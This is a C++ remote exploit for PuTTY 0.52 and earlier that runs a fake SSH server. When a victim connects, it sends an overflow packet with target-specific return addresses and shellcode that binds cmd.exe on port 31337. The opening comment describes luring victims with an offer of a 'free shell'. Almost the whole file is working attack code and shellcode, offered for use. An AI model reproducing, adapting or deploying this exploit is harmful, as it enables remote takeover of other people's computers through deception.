Putty v0.52 and below remote exploit which poses as an ssh daemon and will bind cmd.exe on port 31337 of the victim sshing inbound. Tested against Windows XP and 98SE.
eafb21d90b54269b8a8b5aba1dbea160f82668e29aadfa66c25daf5443e53fc9
/* PUTTYPOWER.CPP remote putty 0.52 exploit
* User friendly robust exploit
*
* To get the most of this exploit get a victim that
* is running putty ver 0.52 client. Something like below;
*
* You: Hey dood interested ina free shell ?
* Victim: Hell yeh, can you hook me up
* You: Yeh sure, waitup, heres my ip. **.**.**.**, ssh to it..
*
* - Victim connects -
*
* Bang u get a shell. Its important
* to connect immediatelly before they kill the process.
* Otherwise your shell is also killed.
*
* Greetz:
* Dayle, sapient, Asmodai, Breezah, RaFa
* WWW.CPIU.US and all its staff !!!
* FxTux <--- very sexy hehe
*
* Thanks to:
* Kralor for some advice in the ASM adjustments
* Johnny Cyberpunk for his elite shellcode
* Rand & Dani at IProyectos Division Seguridad_
* - for the PDU head + other shit i borrowed.
*
* Coder: Hi Tech Assassin
*
* visit WWW.CPIU.US
*
* Email: Hi_Tech_Assassin@hackermail.com
*
*/
#include <winsock2.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#pragma comment (lib,"ws2_32")
#define PORT 22
int DoWinsock(const char* pcHost, int nPort);
SOCKET SetUpListener(const char* pcAddress, int nPort);
void AcceptConnections(SOCKET ListeningSocket);
DWORD WINAPI DoExploit(void* sd_);
void BuildExploit(int targetno);
struct
{
int no;
char *os;
long ret;
}target[] =
{
{1," Windows xp (original release)", 0x77F5801C},
{2," Windows xp sp1",0x77FB59CC},
{3," Windows 98 SE (4.10.2222 A)",0x7FF269BB},
{NULL}
};
char exploitcode[20243];
char ret[4];
char junk[] =
"\x00\x00\x07\xDE";
char pdu_head[] =
"\x53\x53\x48\x2d\x32\x2e\x30\x2d\x31\x2e\x32\x37\x20\x73\x73\x68"
"\x6c\x69\x62\x3a\x20\x57\x69\x6e\x53\x53\x48\x44\x20\x33\x2e\x30"
"\x35\x0d\x0a\x00\x00\x4e\xec\x01\x14\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde";
char shellcode[]=
"\x90"
"\x8B\xEC"
"\xB0\x90"
"\x2B\xE0"
"\x8B\xFC"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x23\x7a\x69\x02\x05\x6c\x59\xf8\x1d\x9c\xde\x8c\xd1\x4c"
"\x70\xd4\x03\xf0\x27\x20\x20\x30\x08\x57\x53\x32\x5f\x33\x32"
"\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed"
"\x2a\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b"
"\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b"
"\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20"
"\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31"
"\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x05\x8d\x44\x45\x04"
"\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b"
"\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f\xb6\x4d"
"\x05\x89\x44\x8d\xd8\xfe\x4d\x05\x75\xbe\xfe\x4d\x04\x74\x21"
"\xfe\x4d\x22\x8d\x5d\x18\x53\xff\xd0\x89\xc7\x6a\x04\x58\x88"
"\x45\x05\x80\x45\x77\x0a\x8d\x5d\x74\x80\x6b\x26\x14\xe9\x78"
"\xff\xff\xff\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff"
"\xd0\x97\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff\x55\xd4\x4e"
"\x56\x57\xff\x55\xcc\x53\x55\x57\xff\x55\xd0\x97\x8d\x45\x88"
"\x50\xff\x55\xe4\x55\x55\xff\x55\xe8\x8d\x44\x05\x0c\x94\x53"
"\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45"
"\xcc\x94\x57\x57\x57\x53\x53\xfe\xc6\x01\xf2\x52\x94\x8d\x45"
"\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52"
"\x53\x53\x53\x55\xff\x55\xec\x6a\xff\xff\x55\xe0";
void usage(char *argv[])
{
int x=0;
printf("\nUsage:\n\n %s <interface addy> <target no>\n\nTargets\n\n",*(char **)&argv);
while(target[x].no)
{
printf("[%d] - %s\n", target[x].no, target[x].os);
x++;
}
printf("\nCoded by: Hi Tech Assassin\n");
}
int DoWinsock(const char* pcAddress, int nPort)
{
printf("Establishing the listener...\n");
SOCKET ListeningSocket = SetUpListener(pcAddress, htons(nPort));
if (ListeningSocket == INVALID_SOCKET)
{
printf("Invalid socket\n");
return 3;
}
printf("Waiting for connections...\n");
while (1)
{
AcceptConnections(ListeningSocket);
printf("Acceptor restarting\n");
}
}
SOCKET SetUpListener(const char* pcAddress, int nPort)
{
u_long nInterfaceAddr = inet_addr(pcAddress);
if (nInterfaceAddr != INADDR_NONE)
{
SOCKET sd = socket(AF_INET, SOCK_STREAM, 0);
if (sd != INVALID_SOCKET)
{
sockaddr_in sinInterface;
sinInterface.sin_family = AF_INET;
sinInterface.sin_addr.s_addr = nInterfaceAddr;
sinInterface.sin_port = nPort;
if (bind(sd, (sockaddr*)&sinInterface,sizeof(sockaddr_in)) != SOCKET_ERROR)
{
listen(sd, SOMAXCONN);
return sd;
}
else
printf("bind() failed");
}
}
return INVALID_SOCKET;
}
void AcceptConnections(SOCKET ListeningSocket)
{
sockaddr_in sinRemote;
int nAddrSize = sizeof(sinRemote);
while (1)
{
SOCKET sd = accept(ListeningSocket, (sockaddr*)&sinRemote,
&nAddrSize);
if (sd != INVALID_SOCKET)
{
printf("Accepted connection from %s:%d..\n",inet_ntoa(sinRemote.sin_addr),ntohs(sinRemote.sin_port));
DWORD nThreadID;
CreateThread(0, 0, DoExploit, (void*)sd, 0, &nThreadID);
}
else
{
printf("accept() failed..\n");
return;
}
}
}
void BuildExploit(int targetno)
{
int cont, cont_comas;
memset(exploitcode, 0x61, sizeof(exploitcode));
cont_comas=0;
for(cont=125;cont<sizeof(exploitcode);cont+=65)
{
cont_comas++;
if(cont_comas>30)
{
memcpy(exploitcode + cont, junk, sizeof(junk)-1);
cont_comas=0;
cont+=3;
}
else
exploitcode[cont]=0x2c;
}
*(long *)&ret[0]=target[targetno].ret;
printf("Attack platform is%s..\n", target[targetno].os);
memcpy(exploitcode+sizeof(exploitcode)-6,"\x00\x00\x00\x00\x00\x00",6);
memcpy(exploitcode,pdu_head,61);
memcpy(exploitcode + 0x1098, ret ,4);
memcpy(exploitcode + 0x109c, shellcode, sizeof(shellcode));
}
DWORD WINAPI DoExploit(void* sd_)
{
int nRetval = 0;
SOCKET sd = (SOCKET)sd_;
send(sd, exploitcode, sizeof(exploitcode),0);
printf("Evil packet sent..\n");
printf("Now connect quickly on port 31337 and check if theres a shell !\n");
return 0;
}
int main(int argc, char* argv[])
{
WSAData wsaData;
int nCode;
if(argc !=3)
{
usage((char**)argv[0]);
return 0;
}
const char* pcHost = argv[1];
printf("==========================================================\n");
printf("========= PUTTYPOWER, remote putty 0.52 exploit ==========\n");
printf("==========================================================\n\n");
printf("Brought to you by Hi Tech Assassin\n\n");
if ((nCode = WSAStartup(MAKEWORD(1, 1), &wsaData)) != 0)
{
printf("WSAStartup() returned error code %d", nCode);
return 255;
}
BuildExploit(atoi(argv[2])-1);
int retval = DoWinsock(pcHost, PORT);
WSACleanup();
return retval;
}